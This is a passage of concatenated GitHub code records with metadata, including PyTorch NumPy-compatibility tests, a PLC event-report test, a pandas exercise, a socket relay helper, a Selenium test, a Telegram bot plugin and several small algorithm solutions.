arrays).\"\"\"\n\n @parametrize(\"func\", single_to_seq_funcs)\n def test_asarray_tensor(self, func):\n t = torch.Tensor([[1, 2, 3], [4, 5, 6]])\n ta = func(t)\n\n assert isinstance(ta, tuple)\n assert all(isinstance(x, w.ndarray) for x in ta)\n\n @parametrize(\"func\", single_to_seq_funcs)\n def test_asarray_list(self, func):\n lst = [[1, 2, 3], [4, 5, 6]]\n la = func(lst)\n\n assert isinstance(la, tuple)\n assert all(isinstance(x, w.ndarray) for x in la)\n\n @parametrize(\"func\", single_to_seq_funcs)\n def test_asarray_array(self, func):\n a = w.asarray([[1, 2, 3], [4, 5, 6]])\n la = func(a)\n\n assert isinstance(la, tuple)\n assert all(isinstance(x, w.ndarray) for x in la)\n\n\nfuncs_and_args = [\n (w.linspace, (0, 10, 11)),\n (w.logspace, (1, 2, 5)),\n (w.logspace, (1, 2, 5, 11)),\n (w.geomspace, (1, 1000, 5, 11)),\n (w.eye, (5, 6)),\n (w.identity, (3,)),\n (w.arange, (5,)),\n (w.arange, (5, 8)),\n (w.arange, (5, 8, 0.5)),\n (w.tri, (3, 3, -1)),\n]\n\n\n@instantiate_parametrized_tests\nclass TestPythonArgsToArray(TestCase):\n \"\"\"Smoke_test (sequence of scalars) -> (array)\"\"\"\n\n @parametrize(\"func, args\", funcs_and_args)\n def test_argstoarray_simple(self, func, args):\n a = func(*args)\n assert isinstance(a, w.ndarray)\n\n\nclass TestNormalizations(TestCase):\n \"\"\"Smoke test generic problems with normalizations.\"\"\"\n\n def test_unknown_args(self):\n # Check that unknown args to decorated functions fail\n a = w.arange(7) % 2 == 0\n\n # unknown positional args\n with assert_raises(TypeError):\n w.nonzero(a, \"kaboom\")\n\n # unknown kwarg\n with assert_raises(TypeError):\n w.nonzero(a, oops=\"ouch\")\n\n def test_too_few_args_positional(self):\n with assert_raises(TypeError):\n w.nonzero()\n\n def test_unknown_args_with_defaults(self):\n # check a function 5 arguments and 4 defaults: this should work\n w.eye(3)\n\n # five arguments, four defaults: this should fail\n with assert_raises(TypeError):\n w.eye()\n\n\nclass TestCopyTo(TestCase):\n def test_copyto_basic(self):\n dst = w.empty(4)\n src = w.arange(4)\n w.copyto(dst, src)\n assert (dst == src).all()\n\n def test_copytobcast(self):\n dst = w.empty((4, 2))\n src = w.arange(4)\n\n # cannot broadcast => error out\n with assert_raises(RuntimeError):\n w.copyto(dst, src)\n\n # broadcast src against dst\n dst = w.empty((2, 4))\n w.copyto(dst, src)\n assert (dst == src).all()\n\n def test_copyto_typecast(self):\n dst = w.empty(4, dtype=int)\n src = w.arange(4, dtype=float)\n\n with assert_raises(TypeError):\n w.copyto(dst, src, casting=\"no\")\n\n # force the type cast\n w.copyto(dst, src, casting=\"unsafe\")\n assert (dst == src).all()\n\n\nclass TestDivmod(TestCase):\n def test_divmod_out(self):\n x1 = w.arange(8, 15)\n x2 = w.arange(4, 11)\n\n out = (w.empty_like(x1), w.empty_like(x1))\n\n quot, rem = w.divmod(x1, x2, out=out)\n\n assert_equal(quot, x1 // x2)\n assert_equal(rem, x1 % x2)\n\n out1, out2 = out\n assert quot is out[0]\n assert rem is out[1]\n\n def test_divmod_out_list(self):\n x1 = [4, 5, 6]\n x2 = [2, 1, 2]\n\n out = (w.empty_like(x1), w.empty_like(x1))\n\n quot, rem = w.divmod(x1, x2, out=out)\n\n assert quot is out[0]\n assert rem is out[1]\n\n @xfail # (\"out1, out2 not implemented\")\n def test_divmod_pos_only(self):\n x1 = [4, 5, 6]\n x2 = [2, 1, 2]\n\n out1, out2 = w.empty_like(x1), w.empty_like(x1)\n\n quot, rem = w.divmod(x1, x2, out1, out2)\n\n assert quot is out1\n assert rem is out2\n\n def test_divmod_no_out(self):\n # check that the out= machinery handles no out at all\n x1 = w.array([4, 5, 6])\n x2 = w.array([2, 1, 2])\n quot, rem = w.divmod(x1, x2)\n\n assert_equal(quot, x1 // x2)\n assert_equal(rem, x1 % x2)\n\n def test_divmod_out_both_pos_and_kw(self):\n o = w.empty(1)\n with assert_raises(TypeError):\n w.divmod(1, 2, o, o, out=(o, o))\n\n\nclass TestSmokeNotImpl(TestCase):\n def test_nimpl_basic(self):\n # smoke test that the \"NotImplemented\" annotation is picked up\n with assert_raises(NotImplementedError):\n w.empty(3, like=\"ooops\")\n\n\n@instantiate_parametrized_tests\nclass TestDefaultDtype(TestCase):\n def test_defaultdtype_defaults(self):\n # by default, both floats and ints 64 bit\n x = w.empty(3)\n z = x + 1j * x\n\n assert x.dtype.torch_dtype == torch.float64\n assert z.dtype.torch_dtype == torch.complex128\n\n assert w.arange(3).dtype.torch_dtype == torch.int64\n\n @parametrize(\"dt\", [\"pytorch\", \"float32\", torch.float32])\n def test_set_default_float(self, dt):\n try:\n w.set_default_dtype(fp_dtype=dt)\n\n x = w.empty(3)\n z = x + 1j * x\n\n assert x.dtype.torch_dtype == torch.float32\n assert z.dtype.torch_dtype == torch.complex64\n\n finally:\n # restore the\n w.set_default_dtype(fp_dtype=\"numpy\")\n\n\n@skip(_np.__version__ <= \"1.23\", reason=\"from_dlpack is new in NumPy 1.23\")\nclass TestExport(TestCase):\n def test_exported_objects(self):\n exported_fns = (\n x\n for x in dir(w)\n if inspect.isfunction(getattr(w, x))\n and not x.startswith(\"_\")\n and x != \"set_default_dtype\"\n )\n diff = set(exported_fns).difference(set(dir(_np)))\n assert len(diff) == 0, str(diff)\n\n\nclass TestCtorNested(TestCase):\n def test_arrays_in_lists(self):\n lst = [[1, 2], [3, w.array(4)]]\n assert_equal(w.asarray(lst), [[1, 2], [3, 4]])\n\n\nclass TestMisc(TestCase):\n def test_ndarrays_to_tensors(self):\n out = _util.ndarrays_to_tensors(((w.asarray(42), 7), 3))\n assert len(out) == 2\n assert isinstance(out[0], tuple) and len(out[0]) == 2\n assert isinstance(out[0][0], torch.Tensor)\n\n @skip(not TEST_CUDA, reason=\"requires cuda\")\n def test_f16_on_cuda(self):\n # make sure operations with float16 tensors give same results on CUDA and on CPU\n t = torch.arange(5, dtype=torch.float16)\n assert_allclose(w.vdot(t.cuda(), t.cuda()), w.vdot(t, t))\n assert_allclose(w.inner(t.cuda(), t.cuda()), w.inner(t, t))\n assert_allclose(w.matmul(t.cuda(), t.cuda()), w.matmul(t, t))\n assert_allclose(w.einsum(\"i,i\", t.cuda(), t.cuda()), w.einsum(\"i,i\", t, t))\n\n assert_allclose(w.mean(t.cuda()), w.mean(t))\n\n assert_allclose(w.cov(t.cuda(), t.cuda()), w.cov(t, t).tensor.cuda())\n assert_allclose(w.corrcoef(t.cuda()), w.corrcoef(t).tensor.cuda())\n\n\nif __name__ == \"__main__\":\n run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/torch_np/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":17010,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"40994418220","text":"# -- coding: utf-8 --\n# CCO 通过集中器主动抄表测试\nimport robot\nimport plc_tb_ctrl\nimport concentrator\nimport tc_common\nimport tc_4_1\nimport time\nimport config\n'''\n4.8 事件主动上报测试\n验证多 STA 站点时,表端产生故障事件,事件主动上报准确性和效率\n'''\n\n\ndef run(tb, band):\n \"\"\"\n Args:\n tb (plc_tb_ctrl.PlcSystemTestbench): testbench object .\n \"\"\"\n assert isinstance(tb, plc_tb_ctrl.PlcSystemTestbench), \"tb type is not plc_tb_ctrl.PlcSystemTestbench\"\n assert isinstance(tb.cct, concentrator.Concentrator), \"tb.cct type is not concentrator\"\n\n addListFile = u'./tc/tc_iot_4/addrlist/互操作性表架拓扑地址_事件上报.txt'\n\n plc_tb_ctrl._debug(\"step1: switch band if needed, wait for net working\")\n tc_4_1.run(tb, band, False)\n plc_tb_ctrl._debug(\"wait 120s start event_report\")\n time.sleep(60)\n tc_common.set_event_report(tb.cct, 1)\n time.sleep(60)\n # 确认CCO已经激活, 由于确认过程中会复位通道1,3;\n # 表架的电表会重新上电,从而模块会读���事件。\n tc_common.wait_cco_power_on(tb, tb.cct, 1, 3)\n # 设置主节点地址\n tb.cct.mac_addr = '00-00-00-00-00-9C'\n plc_tb_ctrl._debug(\"set CCO addr={}\".format(tb.cct.mac_addr))\n tc_common.set_cco_mac_addr(tb.cct, tb.cct.mac_addr)\n # 清除CCO档案\n plc_tb_ctrl._debug(\"reset CCO param area\")\n tc_common.reset_cco_param_area(tb.cct)\n # 添加从节点\n plc_tb_ctrl._debug(\"set sub node address to main cco, and start the main net\")\n nw_top_main, sec_nodes_addr_list = tc_common.read_node_top_list(config.IOT_TOP_LIST_ALL, tb.cct.mac_addr, False)\n tc_common.add_sub_node_addr(tb.cct, sec_nodes_addr_list)\n # 读取事件上报的地址列表\n top, nodelist = tc_common.read_node_top_list(addListFile, log=True)\n for i in range(len(nodelist)):\n nodelist[i] = nodelist[i].replace('-','')\n plc_tb_ctrl._debug(nodelist)\n # 計算結束时间\n stoptime = time.time() + 2000\n # 1000s时间等待组网完成和事件上报,该时间与电科院并不一致\n while stoptime - time.time() > 0:\n frame1376p2 = tb.cct.wait_for_gdw1376p2_frame(afn=0x06, dt1=16, dt2=0, timeout=(stoptime - time.time()),\n tm_assert=False)\n if frame1376p2 is not None:\n frame645 = frame1376p2.user_data.value.data.data\n tc_common.send_gdw1376p2_ack(tb.cct, frame1376p2.user_data.value.r.sn)\n addrTmp = frame645.data[-24: -30: -1]\n # \"\".join(\"{:02x}\".format(x) for x in addrTmp)\n addr = \"\".join(\"%02x\" % x for x in addrTmp)\n for a in nodelist:\n if a == addr:\n nodelist.remove(a)\n plc_tb_ctrl._debug(addr)\n if nodelist.__len__() == 0:\n break\n if nodelist.__len__() != 0:\n s = ''\n for n in nodelist:\n s += n + \"; \"\n plc_tb_ctrl._debug(\"these are meters who don't report event: \" + s)\n\n assert nodelist.__len__() == 0, \"still have event that don't report\"\n","repo_name":"siwaveliu/PLC_SYSTEM_TEST","sub_path":"tc/tc_iot_4/tc_4_8.py","file_name":"tc_4_8.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17455965952","text":"'''\nGrouping by multiple columns\n\nIn this exercise, you will return to working with the Titanic dataset from Chapter 1 and use .groupby() to analyze the distribution of passengers who boarded the Titanic.\n\nThe 'pclass' column identifies which class of ticket was purchased by the passenger and the 'embarked' column indicates at which of the three ports the passenger boarded the Titanic. 'S' stands for Southampton, England, 'C' for Cherbourg, France and 'Q' for Queenstown, Ireland.\n\nYour job is to first group by the 'pclass' column and count the number of rows in each class using the 'survived' column. You will then group by the 'embarked' and 'pclass' columns and count the number of passengers.\n\nThe DataFrame has been pre-loaded as titanic.\n'''\n\nimport pandas as pd\n\ntitanic = pd.read_csv('../datasets/titanic.csv')\n\n'''\nINSTRUCTIONS\n\n* Group by the 'pclass' column and save the result as by_class.\n* Aggregate the 'survived' column of by_class using .count(). Save the result as count_by_class.\n* Print count_by_class. This has been done for you.\n* Group titanic by the 'embarked' and 'pclass' columns. Save the result as by_mult.\n* Aggregate the 'survived' column of by_mult using .count(). Save the result as count_mult.\n* Print count_mult. This has been done for you, so hit 'Submit Answer' to view the result.\n'''\n\n# Group titanic by 'pclass'\nby_class = titanic.groupby('pclass')\n\n# Aggregate 'survived' column of by_class by count\ncount_by_class = by_class['survived'].count()\n\n# Print count_by_class\nprint(count_by_class)\n\n# Group titanic by 'embarked' and 'pclass'\nby_mult = titanic.groupby(['embarked', 'pclass'])\n\n# Aggregate 'survived' column of by_mult by count\ncount_mult = by_mult['survived'].count()\n\n# Print count_mult\nprint(count_mult)\n\n'''\n> titanic.info()\n\nRangeIndex: 1309 entries, 0 to 1308\nData columns (total 14 columns):\npclass 1309 non-null int64\nsurvived 1309 non-null int64\nname 1309 non-null object\nsex 1309 non-null object\nage 1046 non-null float64\nsibsp 1309 non-null int64\nparch 1309 non-null int64\nticket 1309 non-null object\nfare 1308 non-null float64\ncabin 295 non-null object\nembarked 1307 non-null object\nboat 486 non-null object\nbody 121 non-null float64\nhome.dest 745 non-null object\ndtypes: float64(3), int64(4), object(7)\nmemory usage: 143.2+ KB\n\n> count_by_class\npclass\n1 323\n2 277\n3 709\nName: survived, dtype: int64\n\n> count_mult\nembarked pclass\nC 1 141\n 2 28\n 3 101\nQ 1 3\n 2 7\n 3 113\nS 1 177\n 2 242\n 3 495\nName: survived, dtype: int64\n'''","repo_name":"sashakrasnov/datacamp","sub_path":"09-manipulating-dataframes-with-pandas/4-grouping-data/01-grouping-by-multiple-columns.py","file_name":"01-grouping-by-multiple-columns.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"42757777958","text":"from pydantic import BaseModel,Field\nfrom typing import Optional\n\nclass Movie(BaseModel):\n id: Optional[int]\n movie_title:str = Field( max_length=500)\n overview:str = Field( max_length=500)\n year:int = Field(le=2022)\n rating:float = Field(le=10,ge=0)\n category:str = Field(max_length=50)\n\n class Config:\n schema_extra = {\n \"example\":{\n 'id':1,\n \"movie_title\":\"Mi peliculacxvcx\",\n \"overview\":\"Descripcion mivieasdf\",\n \"year\":2022,\n \"rating\":0,\n \"category\":\"sdjk\"\n }\n }","repo_name":"jcastaneda30/deploy-prueba","sub_path":"schemas/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4418275886","text":"def lines(file):\n for line in file:\n yield line\n yield '\\n'\n\n\ndef blocks(file):\n block = []\n for line in lines(file):\n if line.strip(): # strip会去掉最后的\\n\n block.append(line) # 如果有内容就加到列表内\n elif block:\n yield ''.join(block).strip()\n block = []\n","repo_name":"sxy370921/Automatically-add-HTML-tags","sub_path":"HTML_LABALS/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14727351008","text":"\n## 백준 솔루션 템플릿\n# 입력 형식 https://daebaq27.tistory.com/57\n\nimport sys\n\n# 첫 줄에 7, 9 가 입력되고, 뒤의 숫자로 몇 번의 입력이 들어올지 정해지는 경우\nn,m = map(int, sys.stdin.readline().split())\narr = [list(map(int, sys.stdin.readline().split())) for _ in range(m)]\n\nn,m = map(int, input().split()) # 앞의 글자는 n, 뒤의 글자는 m으로 할당됨.\narr = []\n\nfor _ in range(m): # m번 loop을 돌면서 input을 arr에 append\n arr.append(list(map(int, input().split())))\n\n# 반복가능한 객체\nitem = [\"First\", \"Second\", \"Third\"]\nfor i, val in enumerate(item):\n print(\"{} 번쨰 값은 {}입니다\".format(i, val))\n# 0 번쨰 값은 First입니다\n# 1 번쨰 값은 Second입니다\n# 2 번쨰 값은 Third입니다\n\nanswer.add(''.join(result))","repo_name":"sunnyineverywhere/algorithm","sub_path":"yhjune/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40541796220","text":"from __future__ import print_function\nimport random\nfrom os import listdir\nimport glob\n\nimport numpy as np\nfrom scipy import misc\nimport tensorflow as tf\nimport h5py\n\n#from keras.datasets import mnist\n#from keras.utils import np_utils\n\nimport matplotlib.pyplot as plt\n\n#Setting the random seed so that the results are reproducible.\nrandom.seed(101)\n\n#Setting variables for MNIST image dimensions\nmnist_image_height = 8\nmnist_image_width = 8\nfrom sklearn.datasets import load_digits\nfrom sklearn import preprocessing\nfrom sklearn.cross_validation import KFold\nfrom sklearn.model_selection import train_test_split\ndigits = load_digits()\nX = digits[\"data\"]\ny = digits[\"target\"]\n#X = preprocessing.scale(X)\nn_samples = X.shape[0]\nX_new = np.zeros((n_samples,8,8))\nfor i in range(n_samples):\n X_new[i, :, :] = np.reshape(X[i, :] ,(8 ,8))\n\n#kf = KFold(n_splits=5)\nX_train, X_test, y_train, y_test = train_test_split(X_new, y ,test_size=0.2, stratify=y)\n\n#Import MNIST data from keras\n#X_train, X_test, y_train, y_test = train_test_split(digits.data, digits.target)\n#print(X_train.shape)\n#print(y_train.shape) # load data from sklearn\n#(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nclass synthGroup(object):\n def __init__(self, num_sample, num_classes, ratio):# the total number of samples, the number of the classes, the unbalanced ratio between classes\n self.num_sample = num_sample\n self.num_classes = num_classes\n self.ratio = ratio\n\n def seperate_digits(self,samples, y, labels, label):\n num_samples = samples.shape[0]\n synth_indices = []\n\n for j in range(num_samples):\n if y[j] == label:\n synth_indices.append(j)\n num_target = len(synth_indices)\n indice_chosen = np.random.randint(0,num_target,1)\n synth_indices = np.array(synth_indices)\n return synth_indices[indice_chosen]\n\n def generate_group(self,num_samples, labels, c): # the number of this group, the labels of the original digit images, the class number of the newly generated group\n synth_labels = []\n\n # Define synthetic data\n synth_data = np.ndarray(shape=(num_samples, mnist_image_height, mnist_image_width),\n dtype=np.float32)\n num_labels = len(labels)\n digit_indices= np.random.randint(0,num_labels, num_samples)\n sub_label = np.ndarray(shape=(num_samples,1),dtype=np.float32)\n num_digits = []\n for i in range(num_samples):\n\n indice_temp = digit_indices[i]\n num_digits.append(labels[indice_temp])\n\n for j in range(num_samples):\n label_temp = num_digits[j]\n synth_indice = self.seperate_digits(X_train, y_train, labels ,label_temp)\n synth_data[j, :, :] = X_train[synth_indice, :, :]\n synth_labels.append(c)\n sub_label[j] = y_train[synth_indice]\n return synth_data, synth_labels, sub_label\n\n\n","repo_name":"zzUMN/svmPlus","sub_path":"synth_group.py","file_name":"synth_group.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19049543481","text":"# -*- coding: utf-8 -*-\n\nfrom sqlalchemy.orm import Session\n\nfrom forms.user import UserForm\nfrom models.user import User\nfrom repositories.user import UserRepository\n\n\nclass UserService:\n def __init__(self) -> None:\n self.repository = UserRepository\n\n def create(\n self,\n session: Session,\n item: UserForm,\n ) -> User:\n repo = self.repository(session)\n return repo.create(item=item)\n\n def get(\n self,\n session: Session,\n email: str,\n ) -> User:\n repo = self.repository(session)\n return repo.get(reference=email)\n","repo_name":"cristhianclx/logs","sub_path":"app/services/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4784040477","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# spvm setup.py\n\nimport io\nimport os\nimport json\nfrom setuptools import find_packages, setup\n\nhere = os.path.abspath(os.path.dirname(__file__))\nmetaFileName = \"pyp.json\"\n\n# Import the package meta data\nwith open(os.path.join(here, metaFileName)) as pmfile:\n meta = json.loads(pmfile.read())\n\n# Use the README.md as the Long description\nwith io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = '\\n' + f.read()\n\nsetup(\n name=meta['project_info']['name'],\n version=meta['project_vcs']['version'],\n description=meta['project_info']['description'],\n long_description=long_description,\n long_description_content_type='text/markdown',\n author=meta['project_authors'][0]['name'],\n author_email=meta['project_authors'][0]['email'],\n python_requires=meta['project_requirements']['python_version'],\n url=meta['project_info']['url'],\n packages=find_packages(exclude=meta['project_vcs']['exclude_packages']),\n\n install_requires=meta['project_requirements']['python_packages'],\n include_package_data=True,\n license=meta['project_info']['license']\n)\n","repo_name":"yliess86/LPCTorch","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"72"} +{"seq_id":"20197003414","text":"from typing import Dict, List, Union\n\nfrom pyrogram import Client, filters\n\nfrom Alexa import BOT_USERNAME, MUSIC_BOT_NAME, app, db\nfrom Alexa.Database import _get_theme, get_theme, save_theme\n\nthemes = [\n \"blue\",\n \"black\",\n \"red\",\n \"green\",\n \"grey\",\n \"orange\",\n \"pink\",\n \"yellow\",\n \"Random\",\n]\n\nthemes2 = [\n \"blue\",\n \"black\",\n \"red\",\n \"green\",\n \"grey\",\n \"orange\",\n \"pink\",\n \"yellow\",\n]\n\n__MODULE__ = \"🎢 ᴛʜᴇᴍᴇ\"\n__HELP__ = \"\"\"\n\n\n`/settheme`\n- sᴇᴛ ᴀ ᴛʜᴇᴍᴇ ғᴏʀ ᴛʜᴜᴍʙɴᴀɪʟs.\n\n`/theme`\n- ᴄʜᴇᴄᴋ ᴛʜᴇᴍᴇ ғᴏʀ ʏᴏᴜʀ ᴄʜᴀᴛ.\n\n- ᴘᴏᴡᴇʀᴅ ʙʏ 😍 ʀᴏᴄᴋs ᴀɴᴅ @AsadSupport.\n\"\"\"\n\n\n@app.on_message(\n filters.command([\"settheme\", f\"settheme@{BOT_USERNAME}\"]) & filters.group\n)\nasync def settheme(_, message):\n usage = f\"ᴛʜɪs ɪsɴ'ᴛ ᴀ ᴛʜᴇᴍᴇ...\\n\\nsᴇʟᴇᴄᴛ ғʀᴏᴍ ᴛʜᴇᴍ\\n{' | '.join(themes)}\\n\\nᴜsᴇ 'Random' ᴛᴏ ɢᴇᴛ ʀᴀɴᴅᴏᴍ ᴄʜᴏɪᴄᴇ ᴏғ ᴛʜᴇᴍᴇs\"\n if len(message.command) != 2:\n return await message.reply_text(usage)\n theme = message.text.split(None, 1)[1].strip()\n if theme not in themes:\n return await message.reply_text(usage)\n note = {\n \"theme\": theme,\n }\n await save_theme(message.chat.id, \"theme\", note)\n await message.reply_text(f\"ᴄʜᴀɴɢᴇᴅ ᴛʜᴜᴍʙɴᴀɪʟ ᴛʜᴇᴍᴇ ᴛᴏ {theme}\")\n\n\n@app.on_message(filters.command(\"theme\"))\nasync def theme_func(_, message):\n await message.delete()\n _note = await get_theme(message.chat.id, \"theme\")\n if not _note:\n theme = \"Random\"\n else:\n theme = _note[\"theme\"]\n await message.reply_text(\n f\"**{MUSIC_BOT_NAME} ᴛʜᴜᴍʙɴᴀɪʟs ᴛʜᴇᴍᴇ**\\n\\n**ᴄᴜʀʀᴇɴᴛ ᴛʜᴇᴍᴇ:-** {theme}\\n\\n**ᴀᴠᴀɪʟᴀʙʟᴇ ᴛʜᴇᴍᴇs:-** {' | '.join(themes2)} \\n\\nᴜsᴇ /settheme ᴛᴏ ᴄʜᴀɴɢᴇ ᴛʜᴇᴍᴇ...\"\n )\n","repo_name":"TheTeamAlexa/AlexaTGMusic","sub_path":"Alexa/Plugins/Theme.py","file_name":"Theme.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"14751558502","text":"import socket\nimport struct\nimport select\nimport errno\n\n\ndef relay(isock, osock):\n sd, sr, sw = 0, 1, 2\n ioctx = [isock, osock, sr, b'']\n oictx = [osock, isock, sr, b'']\n while ioctx[2] != sd or oictx[2] != sd:\n rfds, wfds = [], []\n for ctx in (ioctx, oictx):\n if ctx[2] == sr:\n rfds.append(ctx[0])\n elif ctx[2] == sw:\n wfds.append(ctx[1])\n rfds, wfds, _ = select.select(rfds, wfds, [])\n for ctx in (ioctx, oictx):\n if ctx[2] == sr and ctx[0] in rfds:\n buf = ctx[0].recv(4096, socket.MSG_DONTWAIT)\n if len(buf) == 0:\n ctx[2] = sd\n ctx[1].shutdown(socket.SHUT_WR)\n else:\n ctx[2] = sw\n ctx[3] = buf\n elif ctx[2] == sw and ctx[1] in wfds:\n try:\n wlen = ctx[1].send \\\n (ctx[3], socket.MSG_DONTWAIT | socket.MSG_NOSIGNAL)\n if wlen == len(ctx[3]):\n ctx[2] = sr\n ctx[3] = b''\n else:\n ctx[3] = ctx[3][wlen:]\n except OSError as e:\n if e.errno == errno.EPIPE:\n isock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,\n struct.pack('@ii', 1, 0))\n osock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,\n struct.pack('@ii', 1, 0))\n ioctx[2], oictx[2] = sd, sd\n else:\n raise e\n","repo_name":"vhqr0/tomato_archive","sub_path":"tomato.1.cpp/py/relay.py","file_name":"relay.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22592287109","text":"from transitions import Machine \n\nclass GameState():\n STATES = ['moving', 'attacking', 'idle']\n\n def __init__(self):\n\n transitions = [\n {'trigger': 'stop', \"source\": \"*\", \"dest\": \"idle\"},\n {\"trigger\": \"walk\", \"source\": \"idle\", \"dest\": \"moving\"},\n {\"trigger\": \"fight\", \"source\": \"idle\", \"dest\": \"attacking\"}\n ]\n\n self.machine = Machine(model=self, states=GameState.STATES, initial=\"idle\", transitions=transitions)\n\n def __str__(self):\n return self.state","repo_name":"hamletrpg/Grid-Based-Battle-System","sub_path":"State.py","file_name":"State.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22208480418","text":"import time\n\nfrom selenium.webdriver import Keys\nfrom selenium.webdriver.common.by import By\nfrom utilities.BaseClass import BaseClass\nclass TestCompanyStructure(BaseClass):\n def test_companystructure(self):\n self.LoginProcessMethod()\n self.driver.find_element(By.CLASS_NAME, 'settings-header').click()\n # SETTINGS PAGE VALIDATION\n clientsettings = self.driver.find_element(By.CLASS_NAME, 'settings__menu').text\n assert (\"Settings\" in clientsettings)\n print(\"---Settings Page---\")\n # COMPANY STRUCTURE TAB\n self.driver.execute_script('arguments[0].click()',\n self.driver.find_element(By.XPATH, '/html/body/app-root/div/app-client/div[1]/div[2]/div/app-settings/div/div/aside/ul/li[4]/a'))\n print(\"--COMPANY STRUCTURE TAB\")\n # ADD NEW DEPARTMENT\n self.driver.find_element(By.CLASS_NAME, \"set_new_department\").click()\n self.driver.find_element(By.CLASS_NAME, \"set_new_department\").send_keys(\"Department Test\")\n self.driver.find_element(By.CLASS_NAME, \"set_new_department\").send_keys(Keys.RETURN)\n time.sleep(8)\n # MORE THAN ONE DEPARTMENT ADDED - VALIDATION\n department_item = self.driver.find_elements(By.CLASS_NAME, \"department_item\")\n print(len(department_item))\n assert len(department_item) >= 1\n # EDIT DEPARTMENT STRUCTURE\n self.driver.find_element(By.CLASS_NAME, \"editbtn_depstructure\").click()\n deletetestitem = self.driver.find_elements(By.CLASS_NAME, \"department_item\")\n for department_del in deletetestitem:\n depitem = department_del.text\n # print(depitem)\n if depitem == \"Department Test\":\n department_del.click()\n time.sleep(10)\n else:\n print(\"ALL Department Structure created are deleted now\")\n assert depitem != \"Department Test\"\n\n self.driver.find_element(By.CLASS_NAME, \"editbtn_depstructure\").click()\n time.sleep(5)\n\n # ADD NEW COMPANY STRUCTURE\n self.driver.find_element(By.CLASS_NAME, \"set_new_location\").click()\n self.driver.find_element(By.CLASS_NAME, \"set_new_location\").send_keys(\"Company Location Test\")\n self.driver.find_element(By.CLASS_NAME, \"set_new_location\").send_keys(Keys.RETURN)\n time.sleep(8)\n # MORE THAN ONE COMPANY - VALIDATION\n compstruc_item = self.driver.find_elements(By.CLASS_NAME, \"companyloc_item\")\n print(len(compstruc_item))\n assert len(compstruc_item) >= 1\n # EDIT DEPARTMENT STRUCTURE\n self.driver.find_element(By.CLASS_NAME, \"editbtn_comploc\").click()\n delcompitems = self.driver.find_elements(By.CLASS_NAME, \"companyloc_item\")\n for company_del in delcompitems:\n companyitem = company_del.text\n if companyitem == \"Company Location Test\":\n company_del.click()\n time.sleep(10)\n else:\n print(\"ALL Company Locations created are deleted now\")\n assert companyitem != \"Company Location Test\"\n\n self.driver.find_element(By.CLASS_NAME, \"editbtn_comploc\").click()\n time.sleep(5)","repo_name":"jrodasscaledev/Tests-AmbitionProfile","sub_path":"tests/test_CompanyStructure.py","file_name":"test_CompanyStructure.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2279774218","text":"arr = [18,7,6,12,15]\n#output = [-1,12,12,15,-1]\n\ndef nextGreatestElement(arr):\n nextgreatelemenlist = [-1 for i in range(len(arr))]\n stack = []\n stack.append(0)\n\n for k in range(1, len(arr)):\n while len(stack) != 0 and arr[k] > arr[stack[-1]]:\n index = stack.pop()\n nextgreatelemenlist[index] = arr[k]\n\n if arr[k] <= arr[stack[-1]]:\n stack.append(k)\n\n return nextgreatelemenlist\n\n\n\nresult = nextGreatestElement(arr)","repo_name":"karthiikselvam/payirchi","sub_path":"Stacks/nextgreatestelement.py","file_name":"nextgreatestelement.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26215074201","text":"# https://leetcode.com/problems/all-paths-from-source-to-target/\nclass Solution:\n def allPathsSourceTarget(self, graph: List[List[int]]) -> List[List[int]]:\n def dfs(graph, path, visited, idx, target, res):\n if idx == target:\n res.append(path[:])\n return\n for x in graph[idx]:\n if x == idx:\n continue\n if x in visited:\n continue\n path.append(x)\n visited.add(x)\n dfs(graph, path, visited, x, target, res)\n visited.remove(x)\n path.pop()\n\n res = []\n path = []\n visited = set()\n n = len(graph)\n\n path.append(0)\n visited.add(0)\n dfs(graph, path, visited, 0, n - 1, res)\n visited.remove(0)\n path.pop()\n\n return 